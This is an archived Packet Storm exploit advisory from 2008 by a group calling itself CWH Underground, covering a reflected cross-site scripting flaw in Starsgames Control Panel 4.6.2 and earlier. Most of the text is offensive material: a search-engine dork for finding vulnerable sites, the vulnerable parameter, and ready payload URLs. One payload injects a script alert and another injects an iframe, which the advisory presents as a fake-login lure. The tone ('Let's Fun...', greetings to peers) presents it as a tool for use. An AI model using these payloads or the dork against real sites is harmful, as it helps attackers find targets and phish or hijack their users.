starsgames-xss.txt

2008-05-20T00:00:00
ID PACKETSTORM:66537
Type packetstorm
Reporter CWH Underground
Modified 2008-05-20T00:00:00

Description

                                        
                                            `==========================================================  
  
Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability   
  
==========================================================  
  
  
AUTHOR : CWH Underground  
DATE : 19 May 2008  
SITE : www.citec.us  
  
  
#####################################################  
APPLICATION : Starsgames Control Panel   
VERSION : <= 4.6.2   
DOWNLOAD : http://www.4shared.com/account/file/41140896/7ba9bd9a/sgcp462full.html]http://www.4shared.com/account/file/411408...gcp462full.html  
#####################################################  
  
  
DORK: "starsgames control panel @2006"  
  
---Exploit---  
  
[-] http://[target]/index.php?showtopic=18&st=</textarea>[XSS]  
  
=Example=  
  
Alert:  
[-] http://[target]/index.php?showtopic=18&st=</textarea><script>alert(/xss/)</script>  
  
Iframe & Fake Login:  
[-] http://[target]/index.php?showtopic=18&st=</textarea><iframe src=http://www.google.com>  
  
  
Let's Fun...  
  
##################################################################  
Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   
##################################################################  
`